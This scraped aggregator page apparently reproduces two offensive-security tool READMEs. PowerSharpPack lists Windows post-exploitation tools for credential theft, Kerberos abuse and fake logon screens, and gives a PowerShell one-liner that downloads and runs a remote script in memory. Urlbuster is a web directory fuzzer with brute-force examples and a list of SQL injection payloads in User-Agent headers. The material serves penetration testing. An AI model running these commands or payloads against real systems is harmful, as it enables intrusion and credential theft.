Internal Monologue Attack: Retrieving NTLM Hashes without Touching LSASS @Credit to: https://github.com/eladshamir/Internal-Monologue
Seatbelt
Seatbelt is a C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives. @Credit to: https://github.com/GhostPack/Seatbelt
SharpWeb
.NET 2.0 CLR project to retrieve saved browser credentials from Google Chrome, Mozilla Firefox and Microsoft Internet Explorer/Edge. @Credit to: https://github.com/djhohnstein/SharpWeb
UrbanBishop
Creates a local RW section in UrbanBishop and then maps that section as RX into a remote process. Shellcode loading made easy. @Credit to: https://github.com/FuzzySecurity/Sharp-Suite
SharpUp
SharpUp is a C# port of various PowerUp functionality. @Credit to: https://github.com/GhostPack/SharpUp
Rubeus
Rubeus is a C# toolset for raw Kerberos interaction and abuses. @Credit to: https://github.com/GhostPack/Rubeus&& https://github.com/gentilkiwi/kekeo/
SharPersist
Windows persistence toolkit written in C#. @Credit to: https://github.com/fireeye/SharPersist
Sharpview
C# implementation of harmj0y's PowerView @Credit to: https://github.com/tevora-threat/SharpView
winPEAS
Check the Local Windows Privilege Escalation checklist from book.hacktricks.xyz @Credit to: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS
Lockless
Lockless allows for the copying of locked files. @Credit to: https://github.com/GhostPack/Lockless
SharpChromium
.NET 4.0 CLR Project to retrieve Chromium data, such as cookies, history and saved logins. @Credit to: https://github.com/djhohnstein/SharpChromium
SharpDPAPI
SharpDPAPI is a C# port of some Mimikatz DPAPI functionality. @Credit to: https://github.com/GhostPack/SharpDPAPI&& https://github.com/gentilkiwi/mimikatz/
SharpShares
Enumerate all network shares in the current domain. Also, can resolve names to IP addresses. @Credit to: https://github.com/djhohnstein/SharpShares
SharpSniper
Find specific users in active directory via their username and logon IP address @Credit to: https://github.com/HunnicCyber/SharpSniper
SharpSpray
SharpSpray a simple code set to perform a password spraying attack against all users of a domain using LDAP and is compatible with Cobalt Strike. @Credit to: https://github.com/jnqpblc/SharpSpray
Watson
Enumerate missing KBs and suggest exploits for useful Privilege Escalation vulnerabilities @Credit to: https://github.com/rasta-mouse/Watson
Grouper2
Find vulnerabilities in AD Group Policy @Credit to: https://github.com/l0ss/Grouper2
Tokenvator
A tool to elevate privilege with Windows Tokens @Credit to: https://github.com/0xbadjuju/Tokenvator
SauronEye
Search tool to find specific files containing specific words, i.e. files containing passwords. @Credit to: https://github.com/vivami/SauronEye
Just load the main script with
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpPack.ps1')
and choose the tool as switch parameter for example:
PowerSharpPack -Seatbelt -Command "all"


If you want to pass multiple parameters to the binary you can just use quotation marks like:
PowerSharpPack -Rubeus -Command "kerberoast /outfile:Roasted.txt"
If you dont want to load all binaries for reasons you can use the per binary Powershell scripts located in the PowerSharpBinaries folder.
Projects which are also available as standalone powershell script:
SharpCloud
Simple C# for checking for the existence of credential files related to AWS, Microsoft Azure, and Google Compute. @Credit to: https://github.com/chrismaddalena/SharpCloud
SharpSSDP
SSDP Service Discovery @Credit to: https://github.com/rvrsh3ll/SharpSSDP
DAFT
DAFT: Database Audit Framework & Toolkit @Credit to: https://github.com/NetSPI/DAFT
Get-RBCD-Threaded
Tool to discover Resource-Based Constrained Delegation attack paths in Active Directory environments @Credit to: https://github.com/FatRodzianko/Get-RBCD-Threaded
SharpGPO-RemoteAccessPolicies
A C# tool for enumerating remote access policies through group policy. @Credit to: https://github.com/FSecureLABS/SharpGPO-RemoteAccessPolicies
SharpAllowedToAct
Computer object takeover through Resource-Based Constrained Delegation (msDS-AllowedToActOnBehalfOfOtherIdentity) @Credit to: https://github.com/pkb1s/SharpAllowedToAct
WireTap
.NET 4.0 Project to interact with video, audio and keyboard hardware. @Credit to: https://github.com/djhohnstein/WireTap
SharpClipboard
C# Clipboard Monitor @Credit to: https://github.com/slyd0g/SharpClipboard
SharpPrinter
Discover Printers + check for vulns @Credit to: https://github.com/rvrsh3ll/SharpPrinter
SharpHide
Tool to create hidden registry keys. @Credit to: https://github.com/outflanknl/SharpHide
SpoolSample
PoC tool to coerce Windows hosts authenticate to other machines via the MS-RPRN RPC interface. This is possible via other protocols as well. @Credit to: https://github.com/leechristensen/SpoolSample
SharpGPOAbuse
SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user's edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO. @Credit to: https://github.com/FSecureLABS/SharpGPOAbuse
SharpDump
SharpDump is a C# port of PowerSploit's Out-Minidump.ps1 functionality. @Credit to: https://github.com/GhostPack/SharpDump
SharpHound3
C# Data Collector for the BloodHound Project, Version 3 @Credit to: https://github.com/BloodHoundAD/SharpHound3
SharpLocker
SharpLocker helps get current user credentials by popping a fake Windows lock screen, all output is sent to Console which works perfect for Cobalt Strike. @Credit to: https://github.com/Pickfordmatt/SharpLocker
Eyewitness
EyeWitness is designed to take screenshots of websites, provide some server header info, and identify default credentials if possible. @Credit to: https://github.com/FortyNorthSecurity/EyeWitness
FakeLogonScreen
Fake Windows logon screen to steal passwords @Credit to: https://github.com/bitsadmin/fakelogonscreen
P0wnedShell
PowerShell Runspace Post Exploitation Toolkit @Credit to: https://github.com/Cn33liz/p0wnedShell
Safetykatz
SafetyKatz is a combination of slightly modified version of @gentilkiwi's Mimikatz project and @subTee's .NET PE Loader I modified this one again with my own obfuscated Mimikatz Version. @Credit to: https://github.com/GhostPack/SafetyKatz
InveighZero
Windows C# LLMNR/mDNS/NBNS/DNS/DHCPv6 spoofer/man-in-the-middle tool . @Credit to: https://github.com/Kevin-Robertson/InveighZero
SharpSploit
SharpSploit is a .NET post-exploitation library written in C#. @Credit to: https://github.com/cobbr/SharpSploit
Snaffler
A tool for pentesters to help find delicious candy, by @l0ss and @Sh3r4 ( Twitter: @/mikeloss and @/sh3r4_hax ). @Credit to: https://github.com/SnaffCon/Snaffler
BadPotato
itm4ns Printspoofer in C#. @Credit to: https://github.com/BeichenDream/BadPotato
BetterSafetyKatz
Fork of SafetyKatz that dynamically fetches the latest pre-compiled release of Mimikatz directly from gentilkiwi GitHub repo, runtime patches signatures and uses SharpSploit DInvoke to PE-Load into memory. @Credit to: https://github.com/Flangvik/BetterSafetyKatz


Urlbuster - Powerful Mutable Web Directory Fuzzer To Bruteforce Existing And/Or Hidden Files Or Directories

$
0
0

Powerful web directory fuzzer to locate existing and/or hidden files or directories.
Similar to dirb or gobuster, but with a lot of mutation options.

Installation
pip install urlbuster

Features
  • Proxy support
  • Cookie support
  • Basic Auth
  • Digest Auth
  • Retries (for slow servers)
  • Persistent and non-persistent HTTP connection
  • Request methods: GET, POST, PUT, DELETE, PATCH, HEAD, OPTIONS
  • Custom HTTP header
  • Mutate POST, PUT and PATCH payloads
  • Mutate with different request methods
  • Mutate with different HTTP headers
  • Mutate with different file extensions
  • Mutate with and without trailing slashes
  • Enumerate GET parameter values

Usage
usage: urlbuster [options] -w <str>/-W <file> BASE_URL
urlbuster -V, --help
urlbuster -h, --version

URL bruteforcer to locate existing and/or hidden files or directories.

Similar to dirb or gobuster, but also allows to iterate over multiple HTTP request methods,
multiple useragents and multiple host header values.

positional arguments:
BASE_URL The base URL to scan.

required arguments:
-w str, --word str Word to use.
-W f, --wordlist f Path to wordlist to use.

optional global arguments:
-n, --new Use a new connection for every request.
If not specified persistent http connection will be used for all requests.
Note, using a new connection will decrease performance,
but ensure to have a clean state on every request.
A persistent connection on the other hand will use any additional cookie values
it has received from a previous request.
-f, --follow Follow redirects.
-k, --insecure Do not verify TLS certificates.
-v, --verbose Show also missed URLs.
--code str [str ...] HTTP status code to treat as success.
You can use a '.' (dot) as a wildcard.
Default: 2.. 3.. 403 407 411 426 429 500 505 511
--payload p [p ...] POST, PUT and PATCH payloads for all requests.
Note, multiple values are allowed for multiple payloads.
Note, if duplicates are specified, the last one will overwrite.
See --mpayload f or mutations.
Format: <key>=<val> [<key>=<val>]
--header h [h ...] Custom http header string to add to all requests.
Note, multiple values are allowed for multiple headers.
Note, if duplicates are specified, the last one will overwrite.
See --mheaders for mutations.
Format: <key>:<val> [<key>:<val>]
--cookie c [c ...] Cookie string to add to all requests.
Format: <key>=<val> [<key>=<val>]
--proxy str Use a proxy for all requests.
Format: http://<host>:<port>
Format: http://<user>:<pass>@<host>:<port>
Format: https://<host>:<port>
Format: https://<user&gt ;:<pass>@<host>:<port>
Format: socks5://<host>:<port>
Format: socks5://<user>:<pass>@<host>:<port>
--auth-basic str Use basic authentication for all requests.
Format: <user>:<pass>
--auth-digest str Use digest authentication for all requests.
Format: <user>:<pass>
--timeout sec Connection timeout in seconds for each request.
Default: 5.0
--retry num Connection retries per request.
Default: 3
--delay sec Delay between requests to not flood the server.
--output file Output file to write results to.

optional mutating arguments:
The following arguments will increase the total number of requests to be made by
applying various mutations and testing each mutation on a separate request.

--method m [m ...] List of HTTP methods to test each request against.
Note, each supplied method will double the number of requests.
Supported methods: GET POST PUT DELETE PATCH HEAD OPTIONS
Default: GET
--mpayload p [p ...] POST, PUT and PATCH payloads to mutate all requests..
Note, multiple values are allowed for multiple payloads.
Format: <key>=<val> [<key>=<val>]
--mheader h [h ...] Custom http header string to add to mutate all requests.
Note, multiple values are allowed for multiple h eaders.
Format: <key>:<val> [<key>:<val>]
--ext ext [ext ...] List of file extensions to to add to words for testing.
Note, each supplied extension will double the number of requests.
Format: .zip [.pem]
--slash str Append or omit a trailing slash to URLs to test.
Note, a slash will be added after the extensions if they are specified as well.
Note, using 'both' will double the number of requests.
Options: both, yes, no
Default: no

misc arguments:
-h, --help Show this help message and exit
-V, --version Show version information

examples

urlbuster -W /path/to/words http://example.com/
urlbuster -W /path/to/words http://example.com:8000/
urlbuster -k -W /path/to/words https:/ /example.com:10000/

Mutation example
Some websites behave differently for the same path depending on the specified useragent.
$ urlbuster \
-W /usr/share/dirb/wordlists/common.txt \
--mheader 'User-Agent:Googlebot/2.1 (+http://www.googlebot.com/bot.html)' \
--method 'POST,GET,DELETE,PUT,PATCH' \
http://www.domain.tld/
██╗   ██╗██████╗ ██╗     ██████╗ ██╗   ██╗███████╗████████╗███████╗██████╗
██║ ██║██╔══██╗██║ ██╔══██╗██║ ██║██╔════╝╚══██╔══╝██╔════╝██╔══██╗
██║ ██║██████╔╝██║ ██████╔╝██║ ██║███████╗ ██║ █████╗ ██████╔╝
██║ ██║██╔══██╗██║ ██╔══██╗██║ ██║╚════██║ ██║ ██╔══╝ ██╔══██╗
╚██████╔╝██║ ██║███████╗██████╔╝╚██████╔╝███████║ ██║ ███████╗██║ ██║
╚═════╝ ╚═╝ ╚═╝╚══════╝╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚══════╝╚═╝ ╚═╝

0.5.0 by cytopia

SETTINGS
Base URL: https://www.everythingcli.org/
Valid codes: 2.., 3.., 403, 407, 411, 426, 429, 500, 505, 511
Connection: Non-persistent
Redirects: Don't follow
Payloads: None
Timeout: 5.0s
Retries: 3
Delay: None

MUTATIONS
Mutating headers: 2
Mutating payloads: 0 (POST)
Methods: 5 (POST, GET, DELETE, PUT, PATCH)
Slashes: no
Extensions: 1 (empty extension)
Words: 4614

TOTAL REQUESTS: 46140
START TIME: 2020-01-29 08:52:12


--------------------------------------------------------------------------------
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.22.0

[301] [GET] http://domain.tld/robots.txt

--------------------------------------------------------------------------------
Connection: keep-alive
Accept-Encoding: gzip, d eflate
Accept: */*
User-Agent: Googlebot/2.1 (+http://www.googlebot.com/bot.html)

[200] [GET] http://domain.tld/robots.txt
[301] [POST] http://domain.tld/robots.txt
[301] [GET] http://domain.tld/robots.txt
[301] [DELETE] http://domain.tld/robots.txt
[301] [PUT] http://domain.tld/robots.txt
[301] [PATCH] http://domain.tld/robots.txt

Examples

Default usage

Basic
$ urlbuster \
-W /path/to/wordlist.txt \
http://www.domain.tld/

Proxy through Burpsuite
$ urlbuster \
-W /path/to/wordlist.txt \
--proxy 'http://localhost:8080' \
http://www.domain.tld/

Save results to file
$ urlbuster \
-W /path/to/wordlist.txt \
--output out.txt \
http://www.domain.tld/

Scan behind Basic Auth
$ urlbuster \
-W /path/to/wordlist.txt \
--auth-basic 'user:pass' \
http://www.domain.tld/

Use session cookie
$ urlbuster \
-W /path/to/wordlist.txt \
--cookie 'PHPSESSID=a79b00e7-035a-2bb4-352a-439d855feabf' \
http://www.domain.tld/

Find files

Find files in root directory
$ urlbuster \
-W /path/to/wordlist.txt \
--code 200 301 302 \
--ext .zip .tar .tar.gz .gz .rar \
http://www.domain.tld/

Find files in sub directory
$ urlbuster \
-W /path/to/wordlist.txt \
--code 200 301 302 \
--ext .zip .tar .tar.gz .gz .rar \
http://www.domain.tld/wp-content/

Advanced usage

Bruteforce query parameter
$ urlbuster \
-W /path/to/wordlist.txt \
--method GET \
--code 200 301 302 \
http://www.domain.tld/search?q=

Bruteforce POST requests
$ urlbuster \
-W /path/to/wordlist.txt \
--code 200 301 302 \
--method POST \
--payload \
'user=somename' \
'pass=somepass' \
'mail=some@mail.tld' \
'submit=yes' \
http://www.domain.tld/

Bruteforce mutated POST requests
$ urlbuster \
-w index.php \
--code 200 301 302 \
--method POST \
--mpayload \
'user=somename1' \
'user=somename2' \
'user=somename3' \
'pass=somepass1' \
'pass=somepass2' \
'pass=somepass3' \
'mail=some@mail1.tld' \
'mail=some@mail2.tld' \
'mail=some@mail3.tld' \
'submit=yes' \
http://www.domain.tld/wp-admin/

Useragent SQL injections
$ urlbuster \
-W /path/to/wordlist.txt \
--code 5.. \
--method GET POST \
--mheader \
"User-Agent: ;" \
"User-Agent: ' or \"" \
"User-Agent: -- or #" \
"User-Agent: ' OR '1" \
"User-Agent: ' OR 1 -- -" \
"User-Agent: \" OR 1 = 1 -- -" \
"User-Agent: '='" \
"User-Agent: 'LIKE'" \
"User-Agent: '=0--+" \
"User-Agent: OR 1=1" \
"User-Agent: ' OR 'x'='x" \
"User-Agent: ' AND id IS NULL; --" \
http://www.domain.tld/

Find potential vhosts
$ urlbuster \
-w / \
--method GET POST \
--mheader \
"Host: internal1.lan" \
"Host: internal2.lan" \
"Host: internal3.lan" \
"Host: internal4.lan" \
"Host: internal5.lan" \
"Host: internal6.lan" \
http://10.0.0.1

cytopia sec tools
Below is a list of sec tools and docs I am maintaining.
NameCategoryLanguageDescription
offsecDocumentationMarkdownOffsec checklist, tools and examples
header-fuzzEnumerationBashFuzz HTTP headers
smtp-user-enumEnumerationPython 2+3SMTP users enumerator
urlbusterEnumerationPython 2+3Mutable web directory fuzzer
netcatPivotingPython 2+3Cross-platform netcat
badcharsReverse EngineeringPython 2+3Badchar generator
fuzzaReverse EngineeringPython 2+3TCP fuzzing tool


Viewing all 5816 articles
Browse latest View live


<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>